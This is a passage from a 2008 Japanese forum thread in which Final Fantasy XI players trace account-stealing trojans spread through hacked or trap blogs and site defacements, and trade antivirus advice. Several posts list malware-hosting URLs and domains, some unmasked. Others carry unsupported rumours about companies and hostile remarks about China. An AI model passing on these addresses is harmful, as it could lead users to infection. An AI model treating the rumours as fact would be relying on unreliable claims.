(dda3よりさらに面倒になっている)。
www■hellh■net/
(略)
www■hellh■net/win.exe

てかこの辺をネタにしてブログ作ろうかな。FC2で。
88 ：既にその名前は使われています：2008/03/12(水) 18:04:18.01 ID:EErp9NDN: 初心者質問ですいませんが、FFやるのは専用PCでネットやるのはMacPCこれ最強？？
（分けて運用にしてもWinネット専用PCが感染したらこわいので、、、）
89 ：既にその名前は使われています：2008/03/12(水) 18:08:24.84 ID:pKFUq6Mz: >>88
Macでも喰らう時は喰らう
ただWindowsに対してMacOSの方が圧倒的に母数が少ないので
ウイルス作る側の人も相手にしてない分喰らう可能性が低い

でも、そのチョイスは正解の一つだとは思う
っつか金持ちめっ
90 ：既にその名前は使われています：2008/03/12(水) 18:08:38.34 ID:APShacGb: Windows Script Encoder かよ＾＾；
91 ：既にその名前は使われています：2008/03/12(水) 18:15:29.54 ID:HB4FRxAS: 2chの関連スレでもFC2は評判良い方ではないからなあ。
むやみやたら様々なサービスに手を広げて適当に放置しているような印象。
余りにも手を広げすぎたせいか、聞いた話によるとSiteでCGI公開しているような
趣味の人に見境無くオファーを出しているという事が有ったらしい。
案件の詳細は伏せつつ、報酬額決定をオファー先に委ねるという感じの。

それがホントかは知らないけど、昨今の状況から正直FC2は
お勧めできるとは言い難いサービスだと思う。
92 ：既にその名前は使われています：2008/03/12(水) 18:16:32.31 ID:MKZtSNNv: >>90
うん。久しぶりに見た。
VBScriptだけかと思ったらJScriptも通るのな。
93 ：既にその名前は使われています：2008/03/12(水) 18:27:01.01 ID:APShacGb: Asciiコード化
URLエンコード
Ascii HighBit
encode()
スクリプトの難読化だけでもネタいっぱいダナ
ポチるだけでMalwareToolKitが自動作成するのかねぇ＾＾；
94 ：既にその名前は使われています：2008/03/12(水) 18:28:15.26 ID:8CoexmK9: >>88
自分そうやって分けてるけど
Macでも時々ウィルスもらってるぞ
（FF関連ではなさそうだが）
だから安心しきらずMacでもセキュリティはちゃんとした方がいいと思う
95 ：既にその名前は使われています：2008/03/12(水) 18:51:59.75 ID:ZIXRWN6n: 某青さんのとこ見たけど、クリーンインストールした
PC二台使い分けてだめなら、クライアント側で
できることねーじゃん？(´_ゝ｀)

サーバー側つつかれたとしか考えられねーよwww
96 ：既にその名前は使われています：2008/03/12(水) 20:34:34.12 ID:7gWLa9Yj: 200番台緊急保守
97 ：既にその名前は使われています：2008/03/12(水) 20:37:04.60 ID:tm75A6Dk: 57のはニコニコではなくメイプルストーリーとURLに書いてあるが…ＦＦなのに何故にネクソンのメイプル？
98 ：既にその名前は使われています：2008/03/12(水) 20:45:55.85 ID:MKZtSNNv: メイプルの垢ハックもあるんすよ。
台湾方面で。
99 ：既にその名前は使われています：2008/03/12(水) 20:50:03.07 ID:M21DHHan: 日本のサイトを狙ったSQLインジェクション攻撃が急増
ttp://www.itmedia.co.jp/enterprise/articles/0803/12/news112.html
感染サイトのURLは「www.2117966.net」となっており、閲覧者が気付かないようにマルウェアを感染させる可能性がある。
同社によれば、このマルウェアはオンラインゲームの情報をPCから盗み出すタイプだと推定されるという。

これってFFも対象?
2117966.netは　CNドメインで登録住所はデタラメ
しこまれてるのはfuckjp.jsってスクリプトらしい。
100 ：既にその名前は使われています：2008/03/12(水) 20:50:19.99 ID:Uh4ryp2P: 某エレ○ンのリンクをクリックしたらPGブロック。
リストは対策室のだけなんだけど･･･
なにを信用したらいいのかわからん。
101 ：既にその名前は使われています：2008/03/12(水) 20:51:55.88 ID:MKZtSNNv: >>99
それは商用サイト狙いじゃないかなぁ。
少なくともブログにSQLは使わんし。
102 ：既にその名前は使われています：2008/03/12(水) 20:52:30.67 ID:M21DHHan: 連投失礼
IPはコリアヤフーの広告ぽい。
103 ：既にその名前は使われています：2008/03/12(水) 20:52:34.65 ID:60JnqpmX: FC2ブログ再改竄の件が不気味すぎる。
アクセスログ握ってる運営側が協力してくれないって…。
104 ：既にその名前は使われています：2008/03/12(水) 21:07:20.99 ID:7gWLa9Yj: >>97
紛らわしいドメインを大量にとって
ウイルス置き場にしてる
105 ：既にその名前は使われています：2008/03/12(水) 21:10:59.22 ID:MKZtSNNv: >>99
降ってくるのは0.exeとxp.exe(スクリプト多すぎなので他にもあるかもしれん)。
AntiVir、Kasperskyでいずれも撃墜。
106 ：既にその名前は使われています：2008/03/12(水) 22:18:07.00 ID:mK9JP7mk: 俺さ、ブログ巡回する時はRSS使ってるんだけど
（livedoorやGoogleのサーバータイプのやつ）
仮に仕込まれていても、これなら安全だよね？

これも安全でないなら、FC2の使用の所は
RSSからもはずそうと思ってるんだが…
107 ：既にその名前は使われています：2008/03/12(水) 22:33:53.57 ID:MKZtSNNv: >>76 の再スキャン。
ttp://www.virustotal.com/analisis/2a77abb11af3b565638f4e57a48fb7a8
カスペはえーな…。
108 ：既にその名前は使われています：2008/03/12(水) 22:35:31.38 ID:r+eMBHNc: 中華の罠を見つけたんで気をつけてくれよな！

www■2ch22■com/2ch00358/00358■zip

Domain name: 2ch22■com
Registrant Contact:
fly bg
bg fly nuigiym2@163■com
0597-2809666 fax: 13605909415
fujianlongyan
longyan Fujian 364000
cn
Created: 2008-03-04
109 ：既にその名前は使われています：2008/03/12(水) 23:50:20.11 ID:MKZtSNNv: zipやrarをわざわざ解凍して踏むような人までは面倒見れんｗ
110 ：既にその名前は使われています：2008/03/13(木) 00:02:38.74 ID:r+eMBHNc: >>109
しかし意外とそういうものこそ未対応の新種だったりしてな。
>>108のやつには00356■zipと言うのもあって、そっちはやばかった。
VIRUSTOTALで12日23時時点で検出したのは2つだけ。
カスペ、NODも華麗にスルー。
使ってるところにだけ検体を提出しといたわ。
111 ：既にその名前は使われています：2008/03/13(木) 00:42:20.72 ID:7vvzHddW: ねるまえの保守
fc2のは原因解明してくれないと怖いなー
112 ：既にその名前は使われています：2008/03/13(木) 00:52:04.90 ID:yUCf7QUF: 社員が業者に売ってるんじゃない
113 ：既にその名前は使われています：2008/03/13(木) 02:14:38.07 ID:azrqgEMc: ほすあげ！
114 ：既にその名前は使われています：2008/03/13(木) 05:17:11.73 ID:WLgaUvl0: おはようあげ。
115 ：既にその名前は使われています：2008/03/13(木) 05:25:10.92 ID:Kdo3iNbf: 【ネット】トレンドマイクロのウイルス情報ページが改ざん…閲覧者にウイルス感染のおそれ [08/03/12]

これ、今朝の毎日だか読売新聞だかに
「オンラインゲームのIDとかの情報盗むやつと思われる｣
とか載っててさらに吹いたｗ
まさかｗｗｗｗｗｗｗ
116 ：既にその名前は使われています：2008/03/13(木) 06:12:25.11 ID:n2vOnz3S: 読売に載ってるね。
これを見る限り、どこのサイトを見てもウイルス感染の危険性があるってことだよね。
そのうちに中国はサイバーテロ国家に認定されんじゃねぇか？
117 ：既にその名前は使われています：2008/03/13(木) 08:04:56.85 ID:ZMg6eBPB: hoshu
118 ：既にその名前は使われています：2008/03/13(木) 08:25:09.23 ID:idfpErbW: ええい、日本のスーパーハカーは何をやってるんだｗ

まあでも、流石にここまでやられると■eも腰を上げてくれるんじゃね
119 ：既にその名前は使われています：2008/03/13(木) 08:36:24.31 ID:Slq9ptja: >>118
そんなもんはいないｗ
国産のアンチウイルスが皆無っつーのも珍しいわ
120 ：既にその名前は使われています：2008/03/13(木) 08:53:44.67 ID:Xm7v7+B6: トレンドは、元々は中国ソフト会社だ。
コスト削減で度重なる不具合を出して会社な。

数年おきに導入PCに致命的不具合を出し騒がれる会社でもある。

ちなみに1年ほど前に不具合出した後、国内でパターン等のリリース前のテストをやっていたが、少し前にコスト削減で海外に出した。

つまり、信用に値しない会社だ。
121 ：補足：2008/03/13(木) 08:54:59.28 ID:Xm7v7+B6: ちなみに海外委託後、速攻で不具合だしたお。
122 ：既にその名前は使われています：2008/03/13(木) 09:26:59.23 ID:Slq9ptja: 中国っつーか台湾ね。
123 ：既にその名前は使われています：2008/03/13(木) 09:32:29.95 ID:yUCf7QUF: 不具合じゃなくて故意だったりしてね
124 ：既にその名前は使われています：2008/03/13(木) 10:08:39.49 ID:hHD/2t0F: チョコボの絵筆もやられたっぽい？
ページがみあたりませんになるが
キャッシュで最後の方のエントリーが見れる。
怪しい事が書かれてるね…
ちなみにテンプレ改ざんチョコボの絵筆で
検索すると、非公開の見出しが
見れるが…

被害拡大してね？
125 ：既にその名前は使われています：2008/03/13(木) 10:31:53.48 ID:tYn5kDAt: 俺はバスターを使い手なのだが

他のソフトに代えるか・・・
マカフィーはPG2と相性悪いようだし、カスペにでもしてみっかね。
126 ：既にその名前は使われています：2008/03/13(木) 10:41:04.29 ID:9iwhsg69: 自分もソフト変えようかと思ってます。
今はノートンだけど、カスペにしてみたい。
でもソフトの評価で「カスペは色々設定あるから初心者には厳しいかも」と載ってたのですが、
そんなに設定難しいのかなぁ・・・困った＞＜
127 ：既にその名前は使われています：2008/03/13(木) 10:43:09.02 ID:R9bTn0eU: フリーのウィルス対策ソフト・スパイウェア対策ソフトって大丈夫ですか？
いままでずっとavast（別マシンではAVG）と、SpyBot使ってるんですが。
ちょくちょく定義ファイル更新あるし、フリーでも大丈夫だと今まで思っていたけど、不安になってき
た・・・
有料のを買ってきたほうがいいんだろうか。
ウィルスバスターなりノートンなり。
128 ：既にその名前は使われています：2008/03/13(木) 10:44:06.55 ID:Slq9ptja: >>126
設定はデフォルトでガチガチに厳しくしてあって、取捨選択していく感じ。
軽くなったと見せかけるために
デフォルト設定がスッカスカなのよりは安心な方式だと思う。
129 ：既にその名前は使われています：2008/03/13(木) 10:44:56.31 ID:Slq9ptja: >>127
その2つよりはavastのがいいと思う。
AVGやAntiVirのがよりいいと思う。
130 ：既にその名前は使われています：2008/03/13(木) 11:20:01.02 ID:5JJ3DOfB: TSPY_ONLINEG.DAU
形式 : トロイの木馬型
別名 : オンラインゲーム

影響を受けるシステム : Windows 98, ME, NT, 2000, XP, Server 2003
暗号化 : なし感染報告 : 低システムの影響 : 高情報漏えいの危険性 : 高

特徴: これは一般的に「トロイの木馬」に分類される不正プログラムです。

影響を受けるソフトウェア:Windows 98, ME, NT, 2000, XP, Server 2003
「TSPY_ONLINEG.DAU」の動作は以下のとおりです。
システムに自身をインストール
情報漏洩
キー入力操作情報を収集
ゲームやアプリケーションのアカウント情報を収集

侵入方法：スパムメールに添付され侵入他の不正プログラムに作成され侵入
悪意のあるWebサイトを介して侵入ユーザの手動ダウンロードにより侵入
131 ：既にその名前は使われています：2008/03/13(木) 11:20:15.01 ID:HnmNYBbQ: とりあえず■eにメールしようぜ。
「怪しいサイトには行くな」って、
現状だとウィルス対策ソフトを売ってる会社のサイトすら
見に行くなって話になる。
132 ：既にその名前は使われています：2008/03/13(木) 11:27:49.25 ID:x6n9OnvC: とうとうLSメンバーやられた
疲れたから解約する、だってさ
GMのマニュアル対応にもカチンときたらしい

「ノーヴィオとれた、ひゃっほーい！」「マジすげいなｗｗｗｗｗ」
って言ってたばっかだったのに・・・
■の対応がこのままなら、ヴァナ崩壊の日も近いかもね・・・
133 ：126：2008/03/13(木) 11:31:14.22 ID:9iwhsg69: >>128
ありがとうございます、カスペ買ってみることにします！
134 ：既にその名前は使われています：2008/03/13(木) 11:33:12.09 ID:HnmNYBbQ: メールしてきたは。
ttps://secure.playonline.com/support/exmf.html#stt

おまいらも出すと良いと思うよ！
135 ：既にその名前は使われています：2008/03/13(木) 11:38:33.19 ID:S3LphSTg: 業者関連の事は、俺もう何年もう幾度となくメールしてきてるが…
懲りずにまたするつもりだけどさ、でも

以前スクエニがテコ入れした時、業者にDOS攻撃掛けられてサーバーダウンしてた事あったよな？
企業と総会屋みたいに体の好いいところで手を打つかたちで
今は裏で業者と密通してんじゃないの？
なーんかここまで放置して、形だけの漏れある修正や
イタチごっこ程度の元を断たない垢バンごっこの繰り返しているの見てるとそう思えるよ
ユーザー側の不意な過失による小さな不利益なんて考えていないというか
故意に看過している気がする
問題が社会的に大きくならんと動かないんじゃね？

結局守るのは自衛しかないんだよな
136 ：既にその名前は使われています：2008/03/13(木) 11:42:20.61 ID:5S2kyIjT: 思い立ったが吉日ですぐ買い替えに走るのもいいが、まずは体験版を入れてみては銅貨?
137 ：既にその名前は使われています：2008/03/13(木) 11:46:44.75 ID:Xm7v7+B6: カスペは未知のウィルスに弱いと言われてるので注意な。
ただ、パターンにより対応が気が狂ったように早いのが売りだと思う。

avastはフリーのわりには良いけど、アジア産ウィルスの対応速度についてはカスペなどに劣るよ。

つーか未知のウィルスに完全対応なんて無理だし、基本的にfwで遮断しろよ。
138 ：既にその名前は使われています：2008/03/13(木) 11:55:27.88 ID:tYn5kDAt: >>127
avast!もAVGもウィルス対策だけだから、
別途ファイアウォールも入れておかないと危ないね。
139 ：既にその名前は使われています：2008/03/13(木) 12:09:09.24 ID:TuDldQeU: 体験版は１ヶ月使えるし、じっくり試すのはいいね
パターンはその間こまめに更新するだろうし

ひとまず今月はその金でルーターを買うのがいい
モデム＝ルーター＝PCとするだけでもそこそこ安全度が増す
その上でセキュリティー、スパイウエア対策することで直つなぎよりは
かなり安全度が増す

完全じゃないという奴もいるかもしれないが、まっぱ状態で
つないでるよりは全然違う。
140 ：既にその名前は使われています：2008/03/13(木) 12:11:42.69 ID:kEiNrZnQ: 今FC2ブログ使ってる奴は
引っ越しを考えた方が良いな。
自分のブログ見に来てくれた人が罠にかかって引退とか泣くわ。
141 ：既にその名前は使われています：2008/03/13(木) 13:46:52.50 ID:hHD/2t0F: まぁ他も安全な保証はないけどな…
シマンテックも改ざんされる位だしwww
142 ：既にその名前は使われています：2008/03/13(木) 14:03:30.62 ID:Slq9ptja: トレンドマイクロとESETだろ
143 ：既にその名前は使われています：2008/03/13(木) 14:13:16.19 ID:L3a8OnEL: ブログ大手ではなくて、
日に数人しか来ないようなブログで被害にあった人はいるのかねー？
144 ：既にその名前は使われています：2008/03/13(木) 14:23:56.63 ID:Slq9ptja: 閑古鳥ブログだと本人が気がつかない限りそのままじゃね?
誰も来なきゃ被害も本人だけ。

それはそうと試しにFC2にアカ取ってみたけど、書くことがない。
145 ：既にその名前は使われています：2008/03/13(木) 14:27:16.33 ID:L3a8OnEL: 閑古鳥ブログで被害にあった人いるなら、
どこか怪しいサイト踏んでしまったのかと思えるけど
大手だけが被害にあっているなら、直接狙われてる可能性の方が高いのかなぁと
146 ：既にその名前は使われています：2008/03/13(木) 14:30:15.69 ID:TuDldQeU: タイトルでFFXI関係のとこをねらってる可能性もありそうだな

カウンターとかおいてりゃ１日あたりどんくらい見てるとかわかるし
そういうとねらえば効率もいいとか思ってそうだ
147 ：既にその名前は使われています：2008/03/13(木) 14:35:13.32 ID:DaQ2jwr9: >>144
書くことないのにどうしてブログ垢とったんかはわからんが
普通にリアル日記でも書いてればいいんじゃね？そこまでは被害広がってないし

報告されてるのが個人の情報系有名ブログだけってのが怖いな
たまたまパス拾ったＦＦブログをハックしたってより
業者が作為的に標的を選んだって感じがする
148 ：既にその名前は使われています：2008/03/13(木) 14:42:08.75 ID:L3a8OnEL: >>78のサイト、「FFXIorFF11、FC2、blog」
の３つのワードでぐぐって上位の方に来るのばっかりだったわ。
他の上位のサイト怖くてふめねーｗ
149 ：既にその名前は使われています：2008/03/13(木) 14:49:22.29 ID:DaQ2jwr9: >>78はどれもFF11+FF11的キーワードのタイトルだな
タイトルで振るいをかけて狙ってる可能性もありそうだ
150 ：既にその名前は使われています：2008/03/13(木) 14:54:18.07 ID:x6n9OnvC: >>149
お前は何を言ってるんだ？
151 ：既にその名前は使われています：2008/03/13(木) 14:57:00.93 ID:TuDldQeU: 何に突っかかってるのかがさっぱりわヵらん
152 ：既にその名前は使われています：2008/03/13(木) 15:00:01.53 ID:hHD/2t0F: >>142
そうだった、素で間違えたわ、スマソ。

しかしこれだけ見事に上位ブログ
ばっかりだと、狙われてるでしょ、コレ…
つまり管理者のパス抜いたっつーか
直接FC2サーバーにアクセスかね？
153 ：既にその名前は使われています：2008/03/13(木) 15:00:06.85 ID:k+RWJjfl: 「ぺってん」とか「戦士」とか「黒猫」が「FF的タイトル」ってどんだけ後遺症だよって話じゃね？ｗ
154 ：既にその名前は使われています：2008/03/13(木) 15:01:34.08 ID:f1xj/CzE: “FF11”+“FF11的キーワード”を“FF11+FF11”的キーワードと
解釈したんでないか
155 ：既にその名前は使われています：2008/03/13(木) 15:05:07.89 ID:L3a8OnEL: >>153
そのブログ全部、FFXIかFF11ってちゃんとタイトルにはいってるんよｗ
156 ：既にその名前は使われています：2008/03/13(木) 15:06:10.08 ID:rfm5mI1E: 3つとも正式タイトルだと「FF11」か「FFXI」が入ってる。
ぺってんと黒猫は「ペット狩り」が入ってるし、「戦士」はまんまジョブ名だな。
157 ：既にその名前は使われています：2008/03/13(木) 15:10:29.05 ID:tIqDotg1: トレンドマイクロのサイト改ざん、閲覧でウイルス感染も : 社会 : YOMIURI ONLINE（読売新聞）
http://ime.nu/www.yomiuri.co.jp/national/news/20080312-OYT1T00829.htm?from=navrkw

＞インターネットセキュリティー会社「ラック」によると、同様の攻撃は１１日夜から１２日にかけ、
＞国内の企業や団体のサイトを対象に急増しており、通常の７０～１００倍に上るという。
＞ラックでは「感染するウイルスはオンラインゲームの情報を盗み出すタイプと推定される。
＞自分が開設したサイトが改ざんされていないか点検してほしい」と呼びかけている。

ウイルス対策ソフト会社をハッキングするくらいなら
FC2くらい余裕でやれそうだよねえ
158 ：既にその名前は使われています ：2008/03/13(木) 15:35:48.80 ID:fNANyHE7: 過疎でモチベ下がって課金停止してるとこに垢ハックきたｗ
もちろん引退解約だ、業者は嫌いだがBANも考えもんだな
やつら本気だぞ、エクレア以外全部無くなってたｗｗｗｗ
過疎＋業者垢ハックでヴァナ崩壊シナリオ始まったな
159 ：既にその名前は使われています：2008/03/13(木) 15:38:30.62 ID:hHD/2t0F: FF11+赤白黒ナイトあたりはゴロゴロと
ありそう。
FC2+FF11+ジョブという検索だったとしたら
次はライブドアとかそんな感じ？
160 ：既にその名前は使われています：2008/03/13(木) 15:40:31.44 ID:R9bTn0eU: すんません
何の脈絡もなくフレのblogに貼られてたんですが・・・
リンク先見てしまいましたが、鬼忍やら何やらと全く関係ない記事が1件載ってるだけ。
田口なんちゃらというＨＮの人にこころあたりも無いし。
fc2だし、怪しい？ような気がして不安です。
いまのところウチの環境では無反応ですが、ここはどうでしょう？
考えすぎでしょうか

No.36 忍ソロ記事メインのブログです田口浩正　[2008/03/13(木)10:25:06]

FFXI 鬼忍withマートキャップの話題（装備、メリポ、rep）を中心に紹介しています。
その他に、各種コンテンツや青魔道士、侍の話題など。

ｈｔｔｐ://hooyudejp.blog71.fc2.com/
161 ：既にその名前は使われています：2008/03/13(木) 15:42:48.56 ID:yjISmaHK: どう見ても典型的な業者サイトｗｗｗｗｗｗｗｗｗｗ

もはや開くまでもにぃ
162 ：既にその名前は使われています：2008/03/13(木) 15:46:28.72 ID:L3a8OnEL: >>159
FF+FC2の検索で上位にきた他の大手が被害にあってないなら
+ジョブの検索していると考えられるねえ。とても頭良い方法とは思えないが。

有名ブログとか詳しくないが、よく名前見かける気がする検索上位FC2ブログ
ぱひる、さくら、魔法のふで、ひっそり
ここいらは被害にあってないのだろうか・・・
163 ：既にその名前は使われています：2008/03/13(木) 15:47:43.29 ID:f1xj/CzE: >>160
既出の罠サイトmegaretic.org、baodongo.orgへご案内
今すぐウイルスチェックを
念のためにPOLのディレクトリを一時リネームしておくといいかもしれない
164 ：既にその名前は使われています：2008/03/13(木) 15:55:14.23 ID:USP3LY9N: >>162
そこらは被害遭ってないかも。
共通するのは他ブロガーとの交流が少ない、
ランキングや相互リンクなどに積極的じゃない。
宣伝はTBPのみ積極的ってとこかねぇ。

ちなみに俺のブログへの罠コメはアク解とか見たら
FC2ランキング参加ブログの相互リンク集から来ていて
過疎ブログを含めてランキングブログのリンク先に同一罠コメ来てたよ。
165 ：既にその名前は使われています：2008/03/13(木) 15:56:30.07 ID:TuDldQeU: >>160
とりあえず田口浩正にわろたｗ

まあリンクだけならあれだが飛んだならチェックだな
166 ：既にその名前は使われています：2008/03/13(木) 15:56:47.16 ID:N9ZMERLK: >>160
自分のブログにも同じコメントが書かれていた
書きこんだ相手のIPがもろCNだったのでさっくり削除
本当に皆さん気をつけて…
167 ：既にその名前は使われています：2008/03/13(木) 15:58:18.82 ID:Slq9ptja: >>147
いやー、ブログの垢抜かれるとかあんの? とか罠コメを集めてみよう! みたいな
ハニーポット的な意味合いも含めネトゲアカハック日記みたいにしようかな( >>87 )
なんて思って取ったんだけど、なんかめんどくせー。
テキストエディタでHTML書いてFTPでアップみたいな世代だからなのかもしれんが。
168 ：160：2008/03/13(木) 15:59:17.45 ID:R9bTn0eU: うぁ
なんか踏んだPCのシステム時計が2000年になってる！
PC全体がなんか重いし。
これは完全に・・・
というかavast無反応なんですが、どうにかする方法ないですか？
169 ：既にその名前は使われています：2008/03/13(木) 16:03:46.08 ID:TuDldQeU: >>168
とりあえずカスペルスキー　オンラインスキャン　でググってスキャンしる
もしウイルス見つかれば体験版落として削除

むろん出来うるなら、再インスコ
170 ：既にその名前は使われています：2008/03/13(木) 16:08:33.48 ID:k+RWJjfl: >155
いや、俺は知ってるけど>150がそう思ったんじゃね？って話ねｗ

>156
「戦士」は（ｒｙ
171 ：既にその名前は使われています：2008/03/13(木) 16:12:06.63 ID:MCQXE5nb: >>168
もしPS2持ってたら急いでそっちからパス変えとき。
172 ：既にその名前は使われています：2008/03/13(木) 16:12:10.14 ID:n2vOnz3S: >168
俺も素人だからよく分からんが、
POLのパス変更⇒POLのディレクトリの一時リネーム⇒カスペオンラインスキャンの
順の方が良いんじゃないか？
173 ：既にその名前は使われています：2008/03/13(木) 16:14:22.00 ID:x6n9OnvC: >>155 >>170
いや、オレが言いたいのはオンラインゲームの垢抜きウイルス仕込むのに
そのオンラインゲームの名前を冠したブログが狙われるって当たり前のことを
さもオレが気づきましたよ風に書かれても困るって意味でつっこんだ
174 ：160：2008/03/13(木) 16:24:15.92 ID:R9bTn0eU: http://ime.nu/www.kaspersky.com/kos/jpj/partner/default/kavwebscan.html
カスペルスキーオンラインスキャンってこれでいいんですか？
承諾して実行すると、

ウイルス定義データベースをアップデートするまでお待ちください
URLからダウンロードします: ftp://downloads4.kaspersky-labs.com/
リモートファイルをダウンロードしています: master.xml

ここで止まってます
もしかしてウィルスが悪さして定義ファイルのダウソすら邪魔することってありますか？

FF入ってるPCじゃないので、POLのほうは大丈夫ですが。
175 ：既にその名前は使われています：2008/03/13(木) 16:24:26.59 ID:hHD/2t0F: >>158
なんか踏んだ？
176 ：既にその名前は使われています：2008/03/13(木) 16:29:57.31 ID:7d4UPpLm: カスペはどうなのか知らんがオンラインスキャンへのアクセスやアンチウイルスソフトの
インスコを妨害するウイルスはある。
177 ：既にその名前は使われています：2008/03/13(木) 16:34:10.44 ID:Slq9ptja: >>168
iframeの先のさらにiframeの先のスクリプトでダウンローダ型のexeが実行され
こいつがFF11・リネージュ・ROの3匹のパス抜きをダウンロードし実行。

セキュリティスカスカでスクリプト込みで全部動けば都合4匹exeが実行されている。
2/20製造(それほど新しくはない)で先月各社に提出済みなんだけど
avastやAVGやBitDefenderやNOD32って返事ないんだよね。

時計戻すのはネトゲトロイでやる意味がないので
単純な故障かもしれんよ。不安ならリカバリ。
178 ：既にその名前は使われています：2008/03/13(木) 16:35:16.05 ID:TuDldQeU: >>174
そこでいいよ
最初は必要なファイルを落とすのに結構時間かかる
あまりに遅いなら体験版落とすべし
179 ：既にその名前は使われています：2008/03/13(木) 16:42:41.87 ID:4Km1hreE: トレンドマイクロのウイルス情報ページ、改竄されたのは9日21時頃から
http://ime.nu/internet.watch.impress.co.jp/cda/news/2008/03/13/18790.html
180 ：既にその名前は使われています：2008/03/13(木) 16:45:00.35 ID:f1xj/CzE: 悪名高き163data.com.cnのホストが最近検索に使ったキーワード
「ff11 武器 2008」、「ff11 攻略 2008」
いずれもyahoo.co.jpから。以前はgoogle.comも使っていた
数としては検索よりリンクをたどったり、リファラなしで来るほうが多い
181 ：既にその名前は使われています：2008/03/13(木) 16:48:35.45 ID:Slq9ptja: 中華ならbaidu.jp使えよとか思った
182 ：既にその名前は使われています：2008/03/13(木) 17:01:33.67 ID:x6n9OnvC: baidu.jpって中国本土からはアクセス規制かかってた気がする
183 ：既にその名前は使われています：2008/03/13(木) 17:01:38.77 ID:f1xj/CzE: >>181
まったくだ
と思って百度で検索したらヒットしなかった
そりゃ来ないわなｗｗ

「おまんこについて」というサイトはヒットするというのにｗｗｗ
184 ：既にその名前は使われています：2008/03/13(木) 17:43:52.37 ID:tUJcz1Zt: あぐ
185 ：既にその名前は使われています：2008/03/13(木) 17:43:55.04 ID:cebZ6MQn: 最近はdrecom.jpに罠ブログやパクリブログを作るケースが散見されるので注意してくれよな！

罠
ttp://ffxihcol1■blog■drecom■jp/

パクリ、いまのところ罠のIFRAMEは確認出来ない
ttp://ff11playonlanei■blog■drecom■jp/
186 ：既にその名前は使われています：2008/03/13(木) 17:49:02.37 ID:jrv/asMx: アゲアゲ！
187 ：既にその名前は使われています：2008/03/13(木) 17:56:29.66 ID:gWi8/dV7: 新装備2 008/3/13 15:45
新装備といいつつテクスチャの張替えしかないので新鮮味が無いなーＮＰＣ用？にトゲトゲした新規の手足装備があるっぽいです。
ttp://ffxihcol1.blog.drecom.jp/ (←罠なので見ないほうがよさげです）
58.22.224.253

アドレスついてたのでIPサーチで検索してみた。

inetnum: 58.22.224.0 - 58.22.239.255
netname: CNCGROUP-FJ-LONGYAN-MAN
country: CN
descr: Longyan city, fujian provincial network of CNCGROUP
admin-c: LY987-AP
tech-c: LY987-AP
status: ALLOCATED NON-PORTABLE
changed: chenmin_deletethispart_@china-netcom.com 20060710
mnt-by: MAINT-CNCGROUP-FJ
mnt-lower: MAINT-CN-LY28
source: APNIC

福建省出そうな。とりあえずブログの管理会社に中国からのアクセスはじけるような設定くれと頼んでみる。
188 ：既にその名前は使われています：2008/03/13(木) 18:00:12.29 ID:7d4UPpLm: >>187
URL削れ、hだけ削っても専ブラだとリンク扱いになるんだよっ
189 ：既にその名前は使われています：2008/03/13(木) 18:03:42.75 ID:TuDldQeU: >>188
アドなかったら情報にもならんだろ

まあせめてドットを他の物に変えるとかぐらいで
190 ：既にその名前は使われています：2008/03/13(木) 18:09:37.38 ID:gWi8/dV7: >>188.189
専ブラの使い手じゃないので気が回らなかった。
すまん。きをつける（´・ω・｀）
191 ：既にその名前は使われています：2008/03/13(木) 18:17:39.51 ID:eaSW8Eqq: セキュリティ会社HPすらハックされるんなら
11公式もそのうち・・・とか考えちゃうな。
192 ：既にその名前は使われています：2008/03/13(木) 18:18:37.90 ID:6o7Lkm7q: 罠ブログの可能性があるブログ会社
FC2　ジュゲム　ドリコム
193 ：既にその名前は使われています：2008/03/13(木) 18:19:52.02 ID:Slq9ptja: >>185
上デリられた模様。検体入手できず。
下罠なし。
>>187
デリられた模様。検体入手できず。
194 ：既にその名前は使われています：2008/03/13(木) 18:20:48.83 ID:Slq9ptja: >>192
サーパラ

ジュゲムは現物見たことがないので判断保留。
195 ：既にその名前は使われています：2008/03/13(木) 18:22:25.54 ID:cebZ6MQn: >>192
ライブドアも忘れないでおくれ。
196 ：既にその名前は使われています：2008/03/13(木) 18:23:00.04 ID:DaQ2jwr9: >>194
ジュゲムはハッキングはないが、罠サイトは報告あるよ

今のところ
ＦＣ２，ジュゲム、ドリコム、サーパラで最も危険なのがＦＣ２
197 ：既にその名前は使われています：2008/03/13(木) 18:23:02.65 ID:4UsBp8Nf: 日本海の海底ケーブル切断で解決しないか？
198 ：既にその名前は使われています：2008/03/13(木) 18:24:47.60 ID:hHD/2t0F: 結局殆どで吹いたwww
199 ：既にその名前は使われています：2008/03/13(木) 18:33:09.16 ID:cebZ6MQn: ライブドアの罠ブログ
罠は通報するとライブドアが”確認して対処します”と返答をよこし丸１月以上立つのだが
未だ大絶賛無対策放置。

罠、記事はリネブログのパクリ。
ttp://blog■livedoor■jp/ahirun1/
ranninpへのステルスIFRAME、珍しく幅だけ30を指定

仮にこのブログを消しても何故かIDは残すので、
他のサービス(フレバ、Wikiなど)で悪事を働ける。
このことからライブドアはある意味FC2以上に危険。
200 ：既にその名前は使われています：2008/03/13(木) 18:33:58.78 ID:DaQ2jwr9: まあ罠ブログだけならどこでも作れるからな・・・ｗ
リンク貼れたらそれだけで事足りる
現状怪しいＵＲＬは開かない■eご推奨ｗの防衛手段で回避できない
悪質な被害が出てるのはＦＣ２

てか、セキュリティ会社まで改竄されてるって言うのに
いつまで■eは怪しいＵＲＬは踏むなで済ませる気なんだ
201 ：既にその名前は使われています：2008/03/13(木) 18:44:53.51 ID:cebZ6MQn: ライブドアブログにおいてはこの事例を決して忘れてはいけない。

ブログ乗っ取り
blog■livedoor■jp/baby_babr_baby_music
202 ：既にその名前は使われています：2008/03/13(木) 18:54:54.50 ID:aHBl8air: IEの設定でIFRAME無効にしたけど効果あんの？
203 ：既にその名前は使われています：2008/03/13(木) 19:35:40.06 ID:pDiD2dce: ｺﾞﾛﾂｷ国家は市ね
204 ：既にその名前は使われています：2008/03/13(木) 19:49:18.22 ID:7FpSUMow: >>200
そこまでいったら■云々だけの問題ではないような。
■が何かしたってウィルスが消えるわけでもないからね。
アカウントやらアイテムやらは取り返せるかもしれんが
無事なのはゲーム内のものだけだからなぁ。
205 ：既にその名前は使われています：2008/03/13(木) 20:00:14.75 ID:tYn5kDAt: IE6の使い手なのだが、FireFox試してみて俺には使いづらかった。

IE6ではブラウザの設定を「高」にして
IFRAME・Java・スクリプト・ActiveX全て無効。
Cookieも全てブロックにしてる。
206 ：既にその名前は使われています：2008/03/13(木) 20:04:17.56 ID:DaQ2jwr9: >>204
いや、■eは警察か何かか？それｗ
過去スレでなんどもでてるような認証方法の見直し、アイテムの補償制度のことだよ
